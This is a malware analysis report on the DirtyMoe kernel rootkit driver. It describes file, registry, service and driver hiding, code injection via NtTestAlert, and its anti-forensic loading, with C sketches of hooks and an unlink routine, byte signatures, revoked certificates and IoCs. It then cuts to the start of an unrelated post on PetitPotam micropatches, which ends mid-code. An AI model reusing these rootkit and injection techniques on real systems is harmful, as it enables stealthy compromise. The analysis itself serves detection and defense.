The driver affects the QueryDirectory results only if the requesting process is not present in the whitelists. There are two whitelists. The first whitelists (Process ID and File names) ensure that the QueryDirectory results are not modified if the process ID or process image file name requesting the given I/O operation (QueryDirectory) is present in them. They represent malware processes that should have access to the file system without restriction. The further whitelist, called WinDeviceNumber, defines a set of suffixes. FltPostOperation() iterates over each item of the QueryDirectory result. If the enumerated item name has a suffix defined in the whitelist, the driver removes the item from the QueryDirectory results. This ensures that the listed files are not visible to non-malware processes [2]. So, the driver can easily hide an arbitrary directory/file from user-mode applications, including explorer.exe. The name of the WinDeviceNumber whitelist is probably derived from malware file names, e.g., Ke145057.xsl, since the suffix is a number; see Appendix B.

2.5 Callback of NTFS Driver

When the driver is loaded, the Driver Entry routine modifies the system driver for the NTFS filesystem. The original callback method for the IRP_MJ_CREATE major function is replaced by a malicious callback MalNtfsCreatCallback() as Figure 1 illustrates. The malicious callback determines what should gain access and what should not.

Figure 1. Rewrite IRP_MJ_CREATE callback of the regular NTFS driver

The malicious callback is active only if the Minifilter Driver registration has been done and the original callback has been replaced. There are whitelists and one blacklist. The whitelists store information about allowed process image names, process IDs, and allowed files. If the process requesting the disk access is whitelisted, then the requested file must also be on the whitelist; it is double protection. The blacklist is focused on process image names; blacklisted processes are denied access to the file system. Figure 2 demonstrates the whitelisting of processes. If a process is on the whitelist, the driver calls the original callback; otherwise, the request ends with access denied.

Figure 2. Grant access to whitelisted processes

In general, if the malicious callback determines that the requesting process is authorized to access the file system, the driver calls the original IRP_MJ_CREATE major function. If not, the driver finishes the request as STATUS_ACCESS_DENIED.
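A hedged sketch of that decision flow (IsProcessAllowed() and IsFileAllowed() are hypothetical helpers standing in for the driver's white/blacklist lookups, and g_OriginalNtfsCreate is the NTFS dispatch routine saved when the hook was installed):

static PDRIVER_DISPATCH g_OriginalNtfsCreate;

BOOLEAN IsProcessAllowed(HANDLE ProcessId);   // hypothetical whitelist/blacklist check
BOOLEAN IsFileAllowed(PIRP Irp);              // hypothetical file whitelist check

NTSTATUS MalNtfsCreatCallback(PDEVICE_OBJECT DeviceObject, PIRP Irp)
{
    if (IsProcessAllowed(PsGetCurrentProcessId()) && IsFileAllowed(Irp)) {
        // Authorized request: forward to the original NTFS IRP_MJ_CREATE handler.
        return g_OriginalNtfsCreate(DeviceObject, Irp);
    }

    // Everything else is refused.
    Irp->IoStatus.Status = STATUS_ACCESS_DENIED;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_ACCESS_DENIED;
}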

2.6 Registry Hiding

The driver can hide a given registry key. Every manipulation of a registry key goes through the kernel method GetCellRoutine(), which the driver hooks. The configuration manager assigns a control block for each open registry key. The control block (CM_KEY_CONTROL_BLOCK) structure keeps all control blocks in a hash table to quickly search for existing control blocks. The GetCellRoutine() method computes the memory address of a requested key. Therefore, if the malware driver takes control over GetCellRoutine(), it can filter which registry keys will be visible; more precisely, which keys will be searched in the hash table.

The malware driver finds the address of the original GetCellRoutine() and replaces it with its own malicious hook method, MalGetCellRoutine(). The driver uses a well-documented implementation [3, 4]. It simply walks the kernel structures obtained via the ZwOpenKey() kernel call, looks for the CM_KEY_CONTROL_BLOCK, and finds its associated HHIVE structure corresponding to the requested key. The HHIVE structure contains a pointer to the GetCellRoutine() method, which the driver replaces; see Figure 3.

Figure 3. Overwriting GetCellRoutine

This method’s pitfall is that the offsets of the looked-up structures, variables, and methods are specific to each Windows version or build. So, the driver must determine which Windows version it is running on.

The MalGetCellRoutine() hook method performs 3 basic operations (sketched in code below the list) as follows:

  1. The driver calls the original kernel GetCellRoutine() method.
  2. Checks whitelists for a requested registry key.
  3. Catches or releases the requested registry key according to the whitelist check.
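A hedged sketch of this control flow follows. The hive types are simplified stand-ins for the real undocumented structures, ShouldHideKey() is a hypothetical helper representing the hide-list and whitelist checks, and the actual "catch" logic is more involved (it returns the last key of the HIVE, as described next):

typedef ULONG HCELL_INDEX_T;                                  // stand-in for HCELL_INDEX
typedef PVOID (*GET_CELL_ROUTINE_T)(PVOID Hive, HCELL_INDEX_T Cell);

static GET_CELL_ROUTINE_T g_OriginalGetCellRoutine;           // saved before the swap

BOOLEAN ShouldHideKey(PVOID Hive, PVOID CellData);            // hypothetical

PVOID MalGetCellRoutine(PVOID Hive, HCELL_INDEX_T Cell)
{
    // 1. Call the original kernel GetCellRoutine().
    PVOID cellData = g_OriginalGetCellRoutine(Hive, Cell);

    // 2. Check the whitelists / hide list for the resolved key.
    if (cellData != NULL && ShouldHideKey(Hive, cellData)) {
        // 3a. "Catch" the key so it never reaches the caller.
        return NULL;
    }

    // 3b. Otherwise, release the key unchanged.
    return cellData;
}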
Registry Key Hiding

The hiding technique uses a simple principle. The driver iterates across the whole HIVE of a requested key. If the driver finds a registry key to hide, it returns the last registry key of the iterated HIVE. When the iteration reaches the end of the HIVE, the driver does not return the last key, since it was returned before; instead, it just returns NULL, which ends the HIVE searching.

The consequence of this principle is that if the driver wants to hide more than one key, it returns the last key of the searched HIVE multiple times. So, the final results of a registry query can contain duplicate keys.

Whitelisting

The services.exe and System services are whitelisted by default, and there is no restriction. Whitelisted process image names are also without any registry access restriction.

The decision-making mechanism is more complicated for Windows 10. The driver hides the requested key only for the regedit.exe application if the Windows 10 build is 14393 (July 2016) or 15063 (March 2017).

2.7 Thread Notification

The main purpose of the Thread Notification is to inject malicious code into newly created threads. The driver registers a thread notification routine via PsSetCreateThreadNotifyRoutine() during the Driver Entry initialization. This registers a callback which is subsequently notified when a new thread is created or deleted. The suspicious callback (PCREATE_THREAD_NOTIFY_ROUTINE) NotifyRoutine() takes three arguments: ProcessID, ThreadID, and a Create flag. The driver affects only threads whose Create flag is set to TRUE, i.e., only newly created threads.
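A minimal sketch of this registration pattern (the callback body is an illustrative stub, not DirtyMoe's code):

#include <ntddk.h>

VOID NotifyRoutine(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create)
{
    UNREFERENCED_PARAMETER(ProcessId);
    UNREFERENCED_PARAMETER(ThreadId);

    if (!Create) {
        return;   // only newly created threads are of interest
    }

    // Here the driver decides, based on its four global variables,
    // whether the new thread belongs to a process that should be injected.
}

// Called from the Driver Entry routine.
NTSTATUS RegisterThreadNotification(VOID)
{
    return PsSetCreateThreadNotifyRoutine(NotifyRoutine);
}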

The whitelisting is focused on two aspects. The first one is an image name, and the second one is command-line arguments of a created thread. The image name is stored in WinDriverMaker1, and arguments are stored as a checksum in the WinDriverMaker2 variable. The driver is designed to inject only two processes defined by a process name and two processes defined by command line arguments. There are no whitelists, just 4 global variables.

2.7.1 Kernel Method Lookup

The successful injection of the malicious code requires several kernel methods. The driver does not call these methods directly, due to detection techniques, and it tries to obfuscate the required methods. The driver requires the following kernel methods: ZwReadVirtualMemory, ZwWriteVirtualMemory, ZwQueryVirtualMemory, ZwProtectVirtualMemory, NtTestAlert, LdrLoadDll.

The kernel methods are needed for successful thread injection because the driver needs to read/write process data of an injected thread, including program instruction.

Virtual Memory Method Lookup

The driver gets the address of the ZwAllocateVirtualMemory() method. As Figure 4 illustrates, all lookup methods are consecutively located after ZwAllocateVirtualMemory() method in ntdll.dll.

Figure 4. Code segment of ntdll.dll with VirtualMemory methods

The driver starts to inspect the code segment from the address of ZwAllocateVirtualMemory() and looks for instructions that move a constant into eax (e.g., mov eax, ??h). This identifies the VirtualMemory methods; see Table 7 for the constants.

Constant Method
0x18 ZwAllocateVirtualMemory
0x23 ZwQueryVirtualMemory
0x3A NtWriteVirtualMemory
0x50 ZwProtectVirtualMemory
Table 7. Constants of Virtual Memory methods for Windows 10 (64 bit)

When an appropriate constant is found, the final address of a looked-up method is calculated as follows:

method_address = constant_address - alignment_constant;
where alignment_constant helps to point to the start of the looked-up method.

The steps to find a method can be summarized as follows (a code sketch follows the list):

  1. Get the address of ZwAllocateVirtualMemory(), which is not suspicious in terms of detection.
  2. Each sought method contains a specific constant on a specific address (constant_address).
  3. If the constant_address is found, another specific offset (alignment_constant) is subtracted;
    the alignment_constant is specific for each Windows version.
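A compact sketch of this lookup under the stated assumptions (the caller supplies the address of ZwAllocateVirtualMemory inside the mapped ntdll.dll, a constant from Table 7, and the version-specific alignment_constant):

// Scan forward from ZwAllocateVirtualMemory looking for "mov eax, imm32"
// (opcode B8 <imm32>) with the target constant, then subtract the
// version-specific alignment to reach the start of the sought routine.
PVOID FindRoutineByConstant(PUCHAR ZwAllocateVirtualMemoryAddr,
                            ULONG TargetConstant,
                            SIZE_T AlignmentConstant,
                            SIZE_T ScanLimit)
{
    for (SIZE_T i = 0; i + 5 <= ScanLimit; i++) {
        PUCHAR p = ZwAllocateVirtualMemoryAddr + i;
        ULONG value;

        RtlCopyMemory(&value, p + 1, sizeof(value));

        if (p[0] == 0xB8 && value == TargetConstant) {
            // method_address = constant_address - alignment_constant
            return p - AlignmentConstant;
        }
    }
    return NULL;
}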

The exact implementation of the Virtual Memory Method Lookup is shown in Figure 5.

Figure 5. Implementation of the lookup routine searching for the kernel VirtualMemory methods

The success of this obfuscation depends on the Windows version identification. We found one Windows 7 version which returns different methods than the malware wants; namely, ZwCompressKey(), ZwCommitEnlistment(), ZwCreateNamedPipeFile(), and ZwAlpcDeleteSectionView().
The alignment_constant is derived from the current Windows version during the driver initialization; see the Driver Entry routine.

NtTestAlert and LdrLoadDll Lookup

A different approach is used for getting the NtTestAlert() and LdrLoadDll() routines. The driver attaches to the winlogon.exe process and gets a pointer to the PEB_LDR_DATA structure containing the PE headers and imports of all processes in the system. If the import table includes a required method, then the driver extracts the base address, which is the entry point to the sought routine.

2.7.2 Process Injection

The aim of the process injection is to load a defined DLL library into a new thread via kernel function LdrLoadDll(). The process injection is slightly different for x86 and x64 OS versions.

The x64 OS version abuses the original NtTestAlert() routine, which checks the thread’s APC queue. An APC (Asynchronous Procedure Call) is a technique to queue a job to be done in the context of a specific thread; it is called periodically. The driver rewrites the instructions of NtTestAlert() so that they jump to the entry point of the malicious code.

Modification of NtTestAlert Code

The first step of the process injection is to find free memory for a code cave. The driver finds free memory near the NtTestAlert() routine address. The code cave includes a shellcode, as Figure 6 demonstrates.

Figure 6. Malicious payload overwriting the original NtTestAlert() routine

The shellcode prepares a parameter (code_cave address) for the malicious code and then jumps into it. The original NtTestAlert() address is moved into rax because the malicious code ends by the return instruction, and therefore the original NtTestAlert() is invoked. Finally, rdx contains the jump address, where the driver injected the malicious code. The next item of the code cave is a path to the DLL file, which shall be loaded into the injected process. Other items of the code cave are the original address and original code instructions of the NtTestAlert().

The driver writes the malicious code to the address defined in dll_loading_shellcode. The original instructions of NtTestAlert() are overwritten with an instruction that simply jumps to the shellcode. As a result, when NtTestAlert() is called, the shellcode runs and jumps into the malicious code.

Malicious Code x64

The malicious code for x64 is simple. Firstly, it recovers the original instruction of the rewritten NtTestAlert() code. Secondly, the code invokes the found LdrLoadDll() method and loads appropriate DLL into the address space of the injected process. Finally, the code executes the return instruction and jumps back to the original NtTestAlert() function.

The x86 OS version abuses the entry point of the injected process directly. The procedure is very similar to the x64 injection, and the x86 malicious code is also identical to the x64 version. However, the x86 malicious code needs to find a 32-bit variant of the LdrLoadDll() method. It uses a technique similar to the one described above (NtTestAlert and LdrLoadDll Lookup).

2.8 Service Hiding

Windows uses the Service Control Manager (SCM) to manage the system services. The executable of SCM is services.exe. This program runs at system startup and performs several functions, such as running, ending, and interacting with system services. The SCM process also keeps all running services in an undocumented service record (SERVICE_RECORD) structure.

The driver must patch the service record to hide a required service. Firstly, the driver must find the services.exe process and attach to it via KeStackAttachProcess(). The malware author defined a byte sequence which the driver looks for in the process memory to find the service record. The services.exe process keeps all running services as a linked list of SERVICE_RECORD structures [5]. The malware driver iterates this list and unlinks the required services defined by the listServices whitelist; see Table 4.

The used byte sequence for Windows 2000, XP, Vista, and Windows 7 is as follows: {45 3B E5 74 40 48 8D 0D}. There is another byte sequence {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D} that is never used because it is bound to the Windows version that the malware driver has never identified; maybe in development.

The hidden services cannot be detected using the PowerShell command Get-Service, Windows Task Manager, Process Explorer, etc. However, started services are logged via the Windows Event Log. Therefore, we can enumerate all regular services and all logged services and then diff the two lists to find the hidden services.

2.9 Driver Hiding

The driver is able to hide itself or another malicious driver based on an IOCTL from the user-mode. The Driver Entry receives a parameter representing the driver object (DRIVER_OBJECT) of the loaded driver image. The driver object contains an officially undocumented item called a driver section. The LDR_DATA_TABLE_ENTRY kernel structure stores information about the loaded driver, such as base/entry point address, image name, image size, etc. The driver section points to LDR_DATA_TABLE_ENTRY entries forming a doubly linked list representing all loaded drivers in the system.

When a user-mode application lists all loaded drivers, the kernel enumerates the double-linked list of the LDR_DATA_TABLE_ENTRY structure. The malware driver iterates the whole list and unlinks items (drivers) that should be hidden. Therefore, the kernel loses pointers to the hidden drivers and cannot enumerate all loaded drivers [6].
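The core of this DKOM trick is an ordinary doubly linked list unlink; a simplified sketch (real code must also take the appropriate synchronization into account, which is omitted here):

VOID UnlinkListEntry(PLIST_ENTRY Entry)
{
    PLIST_ENTRY prev = Entry->Blink;
    PLIST_ENTRY next = Entry->Flink;

    // The neighbours now skip the hidden entry...
    prev->Flink = next;
    next->Blink = prev;

    // ...and the hidden entry points at itself, so that code which later
    // walks it or unlinks it again does not corrupt the list.
    Entry->Flink = Entry;
    Entry->Blink = Entry;
}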

2.10 Driver Unload

The Driver Unload function contains suspicious code, but it seems to be never used in this version. The rest of the unload functionality executes standard procedure to unload the driver from the system.

3. Loading Driver During Boot

The DirtyMoe service loads the malicious driver. The driver image is not permanently stored on disk, since the service always extracts, loads, and deletes the driver image at service startup. The service’s secondary aim is to eliminate evidence of the driver loading and thereby complicate forensic analysis. The service strives to camouflage its registry and disk activity. The DirtyMoe service is registered as follows:

Service name: Ms<volume_id>App; e.g., MsE3947328App
Registry key: HKLM\SYSTEM\CurrentControlSet\services\<service_name>
ImagePath: %SystemRoot%\system32\svchost.exe -k netsvcs
ServiceDll: C:\Windows\System32\<service_name>.dll, ServiceMain
ServiceType: SERVICE_WIN32_SHARE_PROCESS
ServiceStart: SERVICE_AUTO_START

3.1 Registry Operation

On startup, the service creates a registry record, describing the malicious driver to load; see following example:

Registry key: HKLM\SYSTEM\CurrentControlSet\services\dump_E3947328
ImagePath: \??\C:\Windows\System32\drivers\dump_LSI_FC.sys
DisplayName: dump_E3947328

At first glance, it is evident that ImagePath does not reflect DisplayName, contrary to the common Windows naming convention. Moreover, an ImagePath prefixed with the dump_ string is used for virtual drivers (loaded only in memory) managing the memory dump during a Windows crash. The malware mimics this virtual-driver naming convention so as not to be conspicuous. The principle of the memory dump using the virtual drivers is described in [7, 8].

ImagePath values are different for each Windows reboot, but they always abuse the name of a native system driver; see a few instances collected during Windows boots: dump_ACPI.sys, dump_RASPPPOE.sys, dump_LSI_FC.sys, dump_USBPRINT.sys, dump_VOLMGR.sys, dump_INTELPPM.sys, dump_PARTMGR.sys

3.2 Driver Loading

When the registry entry is ready, the DirtyMoe service dumps the driver into the file defined by ImagePath. Then, the service loads the driver via ZwLoadDriver().

3.3 Evidence Cleanup

When the driver is loaded either successfully or unsuccessfully, the DirtyMoe service starts to mask various malicious components to protect the whole malware hierarchy.

The DirtyMoe service removes the registry key representing the loaded driver; see Registry Operation. Further, the loaded driver hides the malware services, as the Service Hiding section describes. Registry entries related to the driver are removed via API calls. Therefore, forensic traces can be found in the SYSTEM registry HIVE, located in %SystemRoot%\system32\config\SYSTEM. The API call just removes the relevant HIVE pointer, but the unreferenced data is still present in the HIVE stored on the disk. Hence, we can read the removed registry entries via RegistryExplorer.

The loaded driver also removes the dumped (dump_ prefix) driver file. We were not able to restore this file via tools enabling recovery of deleted files, but it was extracted directly from the service DLL file.

Capturing the driver image and registry keys

The malware service is responsible for loading the driver and cleaning up the loading evidence. We put a breakpoint into the nt!IopLoadDriver() kernel method, which is reached when a process wants to load a driver into the system. We waited for the wanted driver and then listed all the system processes. The corresponding service (svchost.exe) had a call stack containing the kernel call for driver loading, and we killed that service by modifying the EIP register. The process (service) was killed, and the whole of Windows ended in a BSoD. Windows made a crash dump, so the file system caches were flushed and the malicious service did not finish the cleanup in time. Therefore, we were able to mount the volume and read all the wanted data.

3.4 Forensic Traces

Although the DirtyMoe service takes great pains to cover up the malicious activities, there are a few aspects that help identify the malware.

The DirtyMoe service and loaded driver itself are hidden; however, the Windows Event Log system records information about started services. Therefore, we can get additional information such as ProcessID and ThreadID of all services, including the hidden services.

WinDbg connected to the Windows kernel can display all loaded modules using the lm command. The module list can uncover non-virtual drivers with prefix dump_ and identify the malicious drivers.

Offline connected volume can provide the DLL library of the services and other supporting files, which are unfortunately encrypted and obfuscated with VMProtect. Finally, the offline SYSTEM registry stores records of the DirtyMoe service.

4. Certificates

Windows Vista and later versions of Windows require that loaded drivers be code-signed. The digital code-signature should verify the identity and integrity of the driver vendor [9]. However, Windows does not check the current status of all certificates signing a Windows driver. So, if one of the certificates in the path is expired or revoked, the driver is still loaded into the system. We will not discuss why Windows loads drivers with invalid certificates, since this topic is really wide; backward compatibility, but also the potential impact on the kernel implementation, plays a role.

DirtyMoe drivers are signed with three certificates, as follows:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3C5883BD1DBCD582AD41C8778E4F56D9
Thumbprint: 02A8DC8B4AEAD80E77B333D61E35B40FBBB010A0
Revocation Status: Revoked on 22-May-‎2014 (9:28:59)

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06B7AA2C37C0876CCB0378D895D71041
Thumbprint: 8564928AA4FBC4BBECF65B402503B2BE3DC60D4D
Revocation Status: Revoked on 22-May-‎2018 (2:00:01)

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5F78149EB4F75EB17404A8143AAEAED7
Thumbprint: 31E5380E1E0E1DD841F0C1741B38556B252E6231
Revocation Status: Revoked on 18-Apr-‎2011 (10:42:04)

The certificates have been revoked by their certification authorities, and they are registered as stolen, leaked, misused, etc. [10]. Although all the certificates were revoked in the past, Windows loads these drivers successfully because the root certificate authorities are marked as trusted.

5. Summarization and Discussion

We summarize the main functionality of the DirtyMoe driver. We discuss the quality of the driver implementation, anti-forensic mechanisms, and stolen certificates for successful driver loading.

5.1 Main Functionality

Authorization

The driver is controlled via IOCTL codes which are sent by malware processes in the user-mode. However, the driver implements an authorization mechanism which verifies that the IOCTLs are sent by authenticated processes. Therefore, not all processes can communicate with the driver.

Affecting the Filesystem

If a rootkit is in the kernel, it can do “anything”. The DirtyMoe driver registers itself in the filter manager and begins to influence the results of filesystem I/O operations; in fact, it begins to filter the content of the filesystem. Furthermore, the driver replaces the IRP_MJ_CREATE callback of the NTFS driver, so it can determine what should gain access to the filesystem and what should not.

Thread Monitoring and Code injection

The DirtyMoe driver registers a malicious routine which is invoked when the system creates a new thread. The malicious routine abuses the APC kernel mechanism to execute the malicious code. It loads an arbitrary DLL into the new thread.

Registry Hiding

This technique hooks the kernel method that indexes registry keys in a HIVE. The code execution of the hooked method is redirected to the malicious routine, so the driver can control the indexing of registry keys. In effect, the driver can select which keys will be indexed and which will not.

Service and Driver Hiding

Patching specific kernel structures causes certain API functions to no longer enumerate all system services or loaded drivers. Windows services and drivers are stored as doubly linked lists in the kernel. The driver corrupts these kernel structures so that malicious services and drivers are unlinked from them. Consequently, when the kernel iterates these structures for the purpose of enumeration, the malicious items are skipped.

5.2 Anti-Forensic Technique

As we mentioned above, the driver is able to hide itself. But before driver loading, the DirtyMoe service must register the driver in the registry and dump the driver into the file. When the driver is loaded, the DirtyMoe service deletes all registry entries related to the driver loading. The driver deletes its own file from the file system through the kernel-mode. Therefore, the driver is loaded in the memory, but its file is gone.

The DirtyMoe service removes the registry entries via standard API calls. We can restore this data from the physical storage since the API calls only remove the pointer from HIVE. The dumped driver file is never physically stored on the disk drive because its size is too small and is present only in cache memory. Accordingly, the file is removed from the cache before cache flushing to the disk, so we cannot restore the file from the physical disk.

5.3 Discussion

The whole driver serves as an all-in-one super rootkit package. Any malware can register itself with the driver if it knows the authorization code. After successful registration, the malware can use a wide range of driver functionality. Since the authorization code is hardcoded and the driver’s name can be derived, we could hypothetically communicate with the driver and stop it.

The system loads the driver via the DirtyMoe service within a few seconds. Moreover, the driver file is never present in the file system physically, only in the cache. The driver is loaded via an API call, and the DirtyMoe service keeps a handle to the driver file, so manipulation of the driver file is limited. However, the driver removes its own file using a kernel call. Therefore, the driver file is removed from the file system cache while the handle is still valid, with the difference that the driver file no longer exists, including its forensic traces.

The DirtyMoe malware is written mostly in Delphi. Naturally, the driver is coded in native C. The code style of the driver and the rest of the malware is very different. Our analysis indicates that most of the driver functionality was taken from public samples on internet forums. Each part of the driver is also written in a different style. The malware authors have merged individual rootkit functionality into one kit. They also merged known bugs, so the driver shows a few significant symptoms of its presence in the system. The authors needed to adapt the functionality of the public samples to their purpose, but that has been done in a very dilettante way. It seems that the malware authors are familiar only with Delphi.

Finally, the code-signing certificates that are used were revoked in the middle of their validity period. However, the certificates are still widely used for code signing, so the private keys of the certificates have probably been stolen or leaked. In addition, the stolen certificates were issued by certification authorities that Microsoft trusts, so drivers signed in this way can be successfully loaded into the system despite the revocation. Moreover, the trend in the misuse of such certificates is growing, and predictions show that it will continue to grow in the future. We will analyze the problems of code-signing certificates in a future post.

6. Conclusion

The DirtyMoe driver is an advanced rootkit that DirtyMoe uses to effectively hide malicious activity on infected hosts. This research was undertaken to inspect the rootkit functionality of the DirtyMoe driver and evaluate its impact on infected systems. The study set out to investigate and present an analysis of the driver, namely its functionality, its ability to conceal itself, its deployment, and its code signing.

The research has shown that the driver provides key functionality for hiding malicious processes, services, and registry keys. Another dangerous capability is the injection of malicious code into newly created processes. Moreover, the driver implements a minifilter that monitors and affects I/O operations on the file system, so the content of the file system is filtered and selected files/directories can be hidden from users. An implication of this finding is that the malware and its artifacts are hidden even from AVs. More importantly, the driver implements an additional anti-forensic technique that removes the driver's evidence from disk and registry immediately after it loads. Nonetheless, a few traces can still be found on victims' machines.

This study has provided the first comprehensive review of the driver that protects and serves each malware service and process of the DirtyMoe malware. The scope of this study was limited to the driver's functionality. Further investigation is needed to hunt down and analyze other samples signed with the revoked certificates; that work may make it possible to trace and identify the malware authors through the abused certificates.

IoCs

Samples (SHA-256)
550F8D092AFCD1D08AC63D9BEE9E7400E5C174B9C64D551A2AD19AD19C0126B1
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
B3B5FFF57040C801A4392DA2AF83F4BF6200C575AA4A64AB9A135B58AA516080
CB95EF8809A89056968B669E038BA84F708DF26ADD18CE4F5F31A5C9338188F9
EB29EDD6211836E6D1877A1658E648BEB749091CE7D459DBD82DC57C84BC52B1


Appendix A

Registry entries used in the Start Routine

\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceAddress
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNumber
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceId
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceName
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameOnly
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB_2


Appendix B

Example of registry entries configuring the driver

Key: ControlSet001\Control\WinApi
Value: WinDeviceAddress
Data: Ms312B9050App;   

Value: WinDeviceNumber
Data:
\WINDOWS\AppPatch\Ke601169.xsl;
\WINDOWS\AppPatch\Ke237043.xsl;
\WINDOWS\AppPatch\Ke311799.xsl;
\WINDOWS\AppPatch\Ke119163.xsl;
\WINDOWS\AppPatch\Ke531580.xsl;
\WINDOWS\AppPatch\Ke856583.xsl;
\WINDOWS\AppPatch\Ke999860.xsl;
\WINDOWS\AppPatch\Ke410472.xsl;
\WINDOWS\AppPatch\Ke673389.xsl;
\WINDOWS\AppPatch\Ke687417.xsl;
\WINDOWS\AppPatch\Ke689468.xsl;
\WINDOWS\AppPatch\Ac312B9050.sdb;
\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceName
Data:
C:\WINDOWS\AppPatch\Ac312B9050.sdb;
C:\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceId
Data: dump_FDC.sys;

The post DirtyMoe: Rootkit Driver appeared first on Avast Threat Labs.

Free Micropatches for "PetitPotam" (CVE-2021-36942)

6 August 2021 at 13:27

by Mitja Kolsek, the 0patch Team


Update 8/11/2021-A: August 2021 Windows Updates brought a fix for PetitPotam. In contrast to our patch, which fixes an impersonation issue and keeps the EfsRpcOpenFileRaw request functional, Microsoft's fix disables the EfsRpcOpenFileRaw request. CVE-2021-36942 was assigned to this vulnerability. More details below in the Microsoft's Patch section.

Update 8/11/2021-B: Neither Microsoft's August fix nor our micropatch seem to have covered all PetitPotam affected code. Both fixed the anonymous attack vector but we're investigating additional authenticated paths now and looking for the best way to patch that too. The most effective PetitPotam mitigation currently remains this RPC filter on all Domain Controllers, although it may be an overly broad measure and could break something, so proceed with caution.  

Update 8/19/2021: After further analysis of additional PetitPotam attack vectors, we created additional micropatches that block all these vectors. Today's PetitPotam patches are written for executables from August 2021 Windows Updates, which means you have to have these updates installed (i.e., fully updated Windows as of this writing) in order to have them applied. 

Update 9/15/2021: September 2021 Windows Updates did not bring any changes regarding the new PetitPotam attack vectors, so our micropatches remain free.


Wow, we're busy these days. Just yesterday we issued micropatches for the "Malicious Printer Driver" 0day, and today we're fixing a critical remote code execution issue that allows an anonymous attacker to take over a Windows Domain Controller: the infamous "PetitPotam" bug.

PetitPotam was discovered by security researcher topotam, who published their proof-of-concept on Github on July 20, 2021. There is no official vendor patch for it at the time of this writing; in fact, Microsoft's support article implies they do not consider this a vulnerability but rather a mis-configuration, and provides some generic mitigations that do not address the root issue.

As usual, the CERT/CC vulnerability note by Will Dormann nicely explains the vulnerability and an exploit chain leading to a complete domain takeover. The main problem is that any user - even an anonymous one - can force a domain controller to send the NTLM credentials of its computer account to the attacker's server, where they can be captured and then relayed to another service in the domain to make a malicious privileged request.

 

Analysis

We took a look at what goes on in the code when an EfsRpcOpenFileRaw request is received by the server. It is function  EfsRpcOpenFileRaw_Downlevel in efslsaext.dll that processes this request. This function has most of its code enclosed in an impersonation block between a call to RpcImpersonateClient and a call to RpcRevertToSelf. Code inside this block is being executed under the identity of the requesting entity (in our case, attacker), while code outside executes as Local System, i.e., the computer account.

Unfortunately, function EfsRpcOpenFileRaw_Downlevel, outside the impersonation block, makes a call to EfsGetLocalFileName, which tries to open the attacker-supplied UNC path. By doing so, it sends the local computer's NTLM credentials inside the SMB request to the remote network share. If the attacker is waiting on the other end, they get these credentials.

Let's take a look at relevant parts of function EfsRpcOpenFileRaw_Downlevel:


Beginning of function EfsRpcOpenFileRaw_Downlevel, with EfsGetLocalFileName being called without impersonation

Continuation of function EfsRpcOpenFileRaw_Downlevel

Note that only this call to EfsGetLocalFileName is non-impersonated, while the core EFSRPC functionality executes under the requester's identity. This means that an anonymous or unprivileged user cannot remotely execute EFSRPC functions such as reading or creating arbitrary network files.

 

Micropatch

Our micropatch extends the impersonation block so that it now encloses the previously un-impersonated call to EfsGetLocalFileName; as a result, the SMB request which this function triggers contains the attacker's NTLM credentials instead of the computer account's. Therefore, in the case of an anonymous request the attacker gets credentials of the ANONYMOUS LOGON user (which are of no use), and if they use credentials of a Windows domain user, the acquired NTLM credentials will be of that same user (which they already have).
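
Conceptually, the patched code path behaves like the following user-mode sketch (a simplification for illustration only; the actual fix is applied at the assembly level, as shown in the patchlets below, and the wrapper function and variable names here are ours):

#include <windows.h>
#include <rpc.h>

// Conceptual sketch of the pattern the micropatch enforces: the
// attacker-controlled UNC path is only touched while impersonating the RPC
// client, so any outgoing SMB authentication carries the requester's
// credentials rather than the computer account's.
RPC_STATUS OpenPathImpersonated(const wchar_t *AttackerControlledPath)
{
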